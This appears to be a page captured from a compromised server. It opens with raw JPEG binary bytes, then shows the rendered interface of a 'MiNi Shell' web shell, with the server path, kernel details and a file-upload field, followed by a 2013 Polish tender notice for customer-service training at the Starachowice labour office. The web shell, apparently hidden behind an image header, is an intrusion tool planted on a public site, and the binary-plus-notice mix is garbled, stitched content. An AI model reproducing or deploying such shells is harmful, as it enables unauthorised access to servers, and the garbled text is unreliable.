JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130515/77319-N-2013.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia pn. Trudny klient-profesjonalna obsługa w Urzędzie Pracy dla 5 doradców zawodowych i 12 pośredników pracy zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach dwóch projektów: Profesjonalny pośrednik - dostępny Urząd, Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanych ze środków Europejskiego Funduszu Społecznego, realizowanego z POKL - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Znak sprawy: ZP/9/2013</b><br>
<b>Numer ogłoszenia: 77319 - 2013; data zamieszczenia: 15.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 62 00, faks 41 273 62 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia pn. Trudny klient-profesjonalna obsługa w Urzędzie Pracy dla 5 doradców zawodowych i 12 pośredników pracy zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach dwóch projektów: Profesjonalny pośrednik - dostępny Urząd, Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanych ze środków Europejskiego Funduszu Społecznego, realizowanego z POKL - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Znak sprawy: ZP/9/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia pn. Trudny klient-profesjonalna obsługa w Urzędzie Pracy dla 5 doradców zawodowych i 12 pośredników pracy zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach dwóch projektów: Profesjonalny pośrednik - dostępny Urząd, Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanych ze środków Europejskiego Funduszu Społecznego, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych 
i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie. Znak sprawy: ZP/9/2013. 
Kod zgodnie ze słownikiem CPV 80510000-2.

1. Cel szkolenia: Rozwiniecie umiejętności w zakresie radzenia sobie z różnymi typami klienta 
     w sytuacjach trudnych i konfliktowych oraz umiejętności motywowania klienta.
2.  Program szkolenia musi zawierać następujące bloki tematyczne:
       - Budowa klimatu sprzyjającego efektywnej obsłudze klienta.
       - Typologia klientów.
       - Efektywna komunikacja z klientem.
       - Zasady pośredniej obsługi klientów.
       - Rozwiazywanie sytuacji konfliktowych.
       - Studium przypadku.
3.    Szkolenie ma być przeprowadzone w formie ćwiczeń grupowych i indywidualnych.
4.    Szkolenie zostanie przeprowadzone w dwóch grupach, w odrębnych terminach.
5.    Terminy szkoleń nie mogą się pokrywać.
6.    Liczbę skierowanych pracowników do grupy określa Zamawiający.
7.    Przewiduje się że będą to grupy: I grupa 8 osób, II grupa 9 osób.
8.    Szkolenie ma zostać zorganizowane i przeprowadzone do dnia 25.09.2013 r.
9.    Minimalna liczba godzin szkolenia - 20 godzin dla każdej z grup.
10.  Czas trwania szkolenia 3 dni.
11. Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby zajęcia 
       odbywały się codziennie w dni powszednie.
12. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz w dni ustawowo 
       wolne od pracy.
13.  Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. 
14.  Wykłady muszą się odbywać w sali wykładowej przystosowanej do tego typu celów.
15. Wykonawca zapewni niezbędny sprzęt oraz pomoce dydaktyczne dla prawidłowego 
       przeprowadzenia szkolenia.
16. Wykonawca zapewni w trakcie trwania szkolenia i w miejscu zakwaterowania oraz w przypadku  
     zorganizowania transportu dla uczestników szkolenia warunki zgodne z przepisami bezpieczeństwa  
      i higieny pracy. 
17. Wykonawca zapewni odpowiednią kadrę szkoleniową, opiekuna grupy oraz opracuje szczegółowy 
       harmonogram szkolenia.
18. Wykonawca zobowiązany jest do upowszechniania informacji poprzez oznaczenie sal 
       wykładowych, materiałów dydaktycznych oraz wszelkiej dokumentacji związanej z organizacją 
       szkolenia, że projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
       w ramach Programu Operacyjnego Kapitał Ludzki.    
19. Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały szkoleniowe w formie 
       skryptów, materiałów biurowych (przybory piśmienne, notatnik, itp.), pomoce dydaktyczne  
       niezbędne do realizacji szkolenia oraz szczegółowy harmonogram szkolenia 
20. Po zakończeniu szkolenia Wykonawca zamówienia wyda zaświadczenie zgodne 
        z rozporządzeniem Ministra Edukacji Narodowej z dnia 11.01.2012 r,  oznakowane zgodnie 
        z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał 
        Ludzki.
21. Miejsce szkolenia oraz zakwaterowania uczestników szkolenia nie może być usytuowane 
        bliżej niż 20 km i nie dalej niż 300 km od granicy miasta Starachowice.
22. Wykonawca zapewni przewóz dla 17 uczestników szkolenia z siedziby Zamawiającego tj. 
        Starachowice ul. Radomska 76 do miejsca szkolenia i z powrotem lub pokryje koszty związane 
        z dojazdem 17 uczestników szkolenia ze Starachowic do miejsca szkolenia i z powrotem.   
23. Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników 
       szkolenia od pierwszego do ostatniego dnia szkolenia a w przypadku organizowania przez 
       Wykonawcę przewozu dodatkowo na okres podróży. 
24.  Wykonawca zapewni po dwa noclegi dla 17 osób skierowanych na szkolenie. 
25. Uczestnicy szkolenia zostaną zakwaterowani w hotelu co najmniej dwu gwiazdkowym lub 
       pensjonacie o równorzędnym standardzie w pokojach 2 lub 1 osobowych wyposażonych w pełny 
       węzeł sanitarny.
26. Wykonawca zapewni podczas trwania szkolenia całodzienne wyżywienie dla uczestników  
        szkolenia (2 śniadania, 3 obiady, 2 kolacje) oraz serwis kawowy podczas trwania zajęć. Posiłki 
        mają być podawane w innej sali niż wykładowa przystosowanej do tego celu.  
27. W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu rozpoczęcia 
       szkolenia Wykonawca zapewni dodatkowy nocleg zgodny z w/w opisem, dodatkową kolację
       w przeddzień szkolenia oraz śniadanie w dniu szkolenia. 
28. Zajęcia dydaktyczne muszą odbywać się w miejscu zakwaterowania uczestników szkolenia lub 
       w odległości nie większej niż 1 km od miejsca zakwaterowania. W przypadku gdy zajęcia  
       odbywać się będą w odległości większej niż 1 km od miejsca zakwaterowania uczestników 
       Wykonawca zapewni transport na i z miejsca odbywania zajęć.  
29. Ostatni dzień szkolenia musi zakończyć się w godzinach umożliwiających powrót uczestników 
       szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia.
30. Zamawiający zgodnie z art. 36 ust 4 ustawy prawo zamówień publicznych żąda wskazania 
       w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
31.  Zamawiający przewiduje:   
       - ze strony Wykonawcy możliwość zmiany: opiekuna grupy, kadry dydaktycznej mającej 
       prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, 
       której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by 
       zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej  
       kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. 
       Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji  
       przez Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. Zamawiający  
       dopuszcza zmiany miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia 
       wskazane przez Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał 
       Wykonawca w złożonej ofercie. Zmiana ta wymaga aneksowania umowy. Zamawiający 
       przewiduje zmianę sprzętu technicznego wykorzystywanego podczas przeprowadzania szkolenia 
       określonego w załączniku oraz ofercie jednostki szkolącej pod warunkiem, że wymieniony sprzęt 
       znajdzie zastosowanie  podczas przeprowadzania tego szkolenia. Zmiana ta wymaga jedynie 
       akceptacji Zamawiającego.
       - ze strony Zamawiającego: zmianę terminu wykonania zamówienia (wcześniejsze wykonanie 
       przedmiotu zamówienia), zmianę terminu przeprowadzenia szkolenia, zmianę liczby uczestników 
       szkolenia w poszczególnych grupach, zmianę ogólnej liczby uczestników szkolenia przed jego 
       rozpoczęciem. W przypadku zmiany liczby uczestników szkolenia Zamawiający dokona zapłaty  
       za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby osób przeszkolonych i ceny 
       jednostkowej).
       Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby uczestników szkolenia 
       określonej w opisie przedmiotu zamówienia.
Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy wymienionych  
       w umowie. 
       W przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto przedmiotu 
       zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku.
Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:
     a) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania   
          projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający następujące bloki 
          tematyczne:
       - budowa klimatu sprzyjającego efektywnej obsłudze klienta.
       - typologia klientów.
       - efektywna komunikacja z klientem.
       - zasady pośredniej obsługi klientów.
       - rozwiazywanie sytuacji konfliktowych.
       - studium przypadku.
    b)  harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
  w ramach Programu Operacyjnego Kapitał Ludzki. 
    c) wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi  
          oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d) wzór zaświadczenia o ukończeniu kursu zgodny z rozporządzeniem Ministra Edukacji 
          Narodowej z dnia 11.01.2012 r,  oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania 
          projektów w ramach Programu Operacyjnego Kapitał Ludzki.   
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy.
Przed rozliczeniem finansowym przedmiotu zamówienia Zamawiający w formie protokołu dokona odbioru zadania zleconego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych 
  - załącznik nr 1 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie z należytą starannością w okresie   
   ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
   krótszy w tym okresie przynajmniej jednego szkolenia w temacie przedmiotu zamówienia 
   przeprowadzonego dla pracowników administracji publicznej.
- Ocena nastąpi na podstawie złożonego dokumentu potwierdzającego przeprowadzenie z należytą 
   starannością w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
   prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego szkolenia w temacie 
   przedmiotu zamówienia przeprowadzonego dla pracowników administracji publicznej.
  Dokumentem potwierdzającym przeprowadzenie z należytą starannością w okresie ostatnich 3 lat 
  przed upływem terminu składania ofert szkolenia może być dokument, który jednoznacznie 
  potwierdzi należyte wykonanie usługi np.: list referencyjny, protokół odbioru usługi szkoleniowej 
  itp. wydany przez jednostkę, dla której Wykonawca ubiegający się o udzielenie zamówienia 
  przeprowadził szkolenie w temacie przedmiotu zamówienia przeprowadzonego dla pracowników   
  administracji publicznej. Dokument ten musi zawierać termin przeprowadzenia tego szkolenia. 
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
   - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych 
   - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem technicznym   
   zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 2 do SIWZ. 
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
    - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania 
    przedmiotu zamówienia - załącznik nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej realizację przedmiotu  
   zamówienia - załącznik nr 4 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. dokument potwierdzający przeprowadzenie z należytą 
   starannością w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
   prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego szkolenia w temacie 
   przedmiotu zamówienia przeprowadzonego dla pracowników administracji publicznej.
  Dokumentem potwierdzającym przeprowadzenie z należytą starannością w okresie ostatnich 3 lat 
  przed upływem terminu składania ofert szkolenia może być dokument, który jednoznacznie 
  potwierdzi należyte wykonanie usługi np.: list referencyjny, protokół odbioru usługi szkoleniowej 
  itp. wydany przez jednostkę, dla której Wykonawca ubiegający się o udzielenie zamówienia 
  przeprowadził szkolenie w temacie przedmiotu zamówienia przeprowadzonego dla pracowników   
  administracji publicznej. Dokument ten musi zawierać termin przeprowadzenia tego szkolenia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kwalifikacje kadry dydaktycznej mającej prowadzić to szkolenie - 15</li>
<li>3 - Kryterium jakości świadczonych usług przez Wykonawcę - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której projekt 
     stanowi załącznik Nr 8 do niniejszej specyfikacji.
2. W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu  
     zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku
3. Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej zmiany 
     okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można  
     było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 
     30 dni od powzięcia wiadomości o tych okolicznościach.
     W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu 
     wykonania części umowy.
4.  Zamawiający przewiduje:   
       - ze strony Wykonawcy możliwość zmiany: opiekuna grupy, kadry dydaktycznej mającej 
       prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, 
       której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by 
       zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej  
       kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. 
       Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji  
       przez Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. Zamawiający  
       dopuszcza zmiany miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia 
       wskazane przez Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał 
       Wykonawca w złożonej ofercie. Zmiana ta wymaga aneksowania umowy. Zamawiający 
       przewiduje zmianę sprzętu technicznego wykorzystywanego podczas przeprowadzania szkolenia 
       określonego w załączniku oraz ofercie jednostki szkolącej pod warunkiem, że wymieniony sprzęt 
       znajdzie zastosowanie podczas przeprowadzania tego szkolenia. Zmiana ta wymaga jedynie 
       akceptacji Zamawiającego.
       - ze strony Zamawiającego: zmianę terminu wykonania zamówienia (wcześniejsze wykonanie 
       przedmiotu zamówienia), zmianę terminu przeprowadzenia szkolenia, zmianę liczby uczestników 
       szkolenia w poszczególnych grupach, zmianę ogólnej liczby uczestników szkolenia przed jego 
       rozpoczęciem. W przypadku zmiany liczby uczestników szkolenia Zamawiający dokona zapłaty  
       za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby osób przeszkolonych i ceny 
       jednostkowej). Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby 
       uczestników szkolenia określonej w opisie przedmiotu zamówienia.
       Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy wymienionych  
       w umowie. 
       W przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto przedmiotu 
       zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku. 
Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:
     a) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania   
          projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający następujące bloki 
          tematyczne:
       - budowa klimatu sprzyjającego efektywnej obsłudze klienta.
       - typologia klientów.
       - efektywna komunikacja z klientem.
       - zasady pośredniej obsługi klientów.
       - rozwiazywanie sytuacji konfliktowych.
       - studium przypadku.
    b)  harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
  w ramach Programu Operacyjnego Kapitał Ludzki. 
    c) wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi  
          oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d) wzór zaświadczenia o ukończeniu kursu zgodny z rozporządzeniem Ministra Edukacji 
          Narodowej z dnia 11.01.2012 r,  oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania 
          projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www-pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl 
Zakładka zamówienia publiczne.</p>
